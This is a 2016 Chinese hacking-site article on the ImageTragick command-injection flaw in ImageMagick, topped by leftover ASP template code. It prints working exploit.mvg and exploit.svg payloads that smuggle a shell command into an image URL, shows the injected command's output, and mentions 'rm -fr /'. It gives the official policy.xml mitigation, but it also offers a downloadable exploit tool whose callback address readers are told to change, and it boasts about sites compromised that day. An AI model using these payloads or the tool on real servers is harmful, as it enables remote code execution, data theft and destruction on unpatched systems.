<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("图片,服务器,自检") PageTitle=stripHTML("上传个图片都能拿下服务器!赶紧自检!") ArticleIntro=stripHTML("最近各种互联网网站的图片上传等功能几乎都被黑客玩了一遍,这全因一个新的“魔图攻击”所致。") Articlecontent=stripHTML("网站上的图片相关功能可以被黑客利用秒取网站服务器控制权!比如传一张图直接就给服务器关机,或执行 “rm -fr /” 删除文件,再或窃取用户敏感数据等,而造成这…") ModuleName = stripHTML("hack") InfoID = stripHTML("226384") ChannelShortName=stripHTML("Hack") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("hack") %> 上传个图片都能拿下服务器!赶紧自检! - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> Hack >> 黑客技术 >> 黑客入侵 >> 正文

[组图]上传个图片都能拿下服务器!赶紧自检!

2016/5/6 作者:华盟君 来源: 网络收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

  网站上的图片相关功能可以被黑客利用秒取网站服务器控制权!比如传一张图直接就给服务器关机,或执行 “rm -fr /” 删除文件,再或窃取用户敏感数据等,而造成这些后果的只是一张特殊的图片…

  这个时候不得不喊出口号「睡你麻痹,起来 High」,上次 Struts 2 漏洞席卷全球还有余温,这次核弹级漏洞 ImageTragick 来了!赶紧检查自家服务,今夜别睡!

  ~~~~~~~~~~~~~~~

  [紧急预警]

  关于 ImageTragick 漏洞(官网):

  https://imagetragick.com/

  官网上已经给出了好几种测试姿势,比如:

       

  ImageTragick 相关漏洞挖掘测试和漏洞影响自查,请参考:

  http://www.imagemagick.org/script/api.php

  可以看到数目繁多,用了如下组件的都可能受此漏洞影响:

        

  ~~~~~~~~~~~~~~~~~~~~~~~~

  漏洞产生的原因是 ImageMagick 使用 system() 指令调用来处理 HTTPS 请求,而对用户传入的 shell 参数没有做好过滤,导致能注入任意指令执行。

EXPOLIT

exploit.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(/hack/UploadFiles_8057/201605/20160506095448499.jpg"|ls "-la)'
pop graphic-context

exploit.svg
-=-=-=-=-=-=-=-=-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="SVG namespace" xmlns:xlink=
"XLink namespace">
<image xlink:href="http://www.77169.com/hack/UploadFiles_8057/201605/20160506095448499.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

$ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..
...

  最后看一下,有那些网站今天被人搞了!!

       

  ~~~~~~~~~~~~~~~

  临时防护建议(by imagetragick.com):

  使用配置文件暂时禁用 ImageMagick 的部分编码器,可在 “/etc/ImageMagick/policy.xml” 文件中添加如下代码:

<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>

  详见官方建议: ImageMagick Security Issue ( https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588 )

  ~~~~~~~~~~~~~~~~~~

  说了半天不带工具,那不是刷流氓吗?

  这个主要是php调用的,asp,aspx应当不影响,反正我测试了没成功,

       

  需要自己修改上线地址

      

  EXP下载链接

  链接: http://pan.baidu.com/s/1c1Xhqvu 密码: bw5w



  • 上一篇Hack:

  • 下一篇Hack: 没有了